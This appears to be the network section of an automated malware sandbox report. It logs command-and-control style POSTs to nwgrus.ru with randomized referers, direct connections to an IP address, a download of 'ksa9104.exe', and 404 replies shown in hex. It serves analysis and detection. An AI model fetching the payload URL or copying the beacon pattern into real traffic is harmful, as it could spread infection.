      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drxslflnmsuof.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://juflamsakvad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omekhnsmgqeu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nkkmigjawaaknrre.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewehlvglopwca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gnpoohklywxdvf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yaiqkdhqwmycp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrsmvamryedsmns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vdkygqlrtijypkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blhloseiscjcafeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ficvdttvkapihqjd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rydhygdypun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tasohhqhxavd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
      Source: global trafficDNS traffic detected: DNS query: fallhandbat.com
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddmlqgiwokgjnrjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
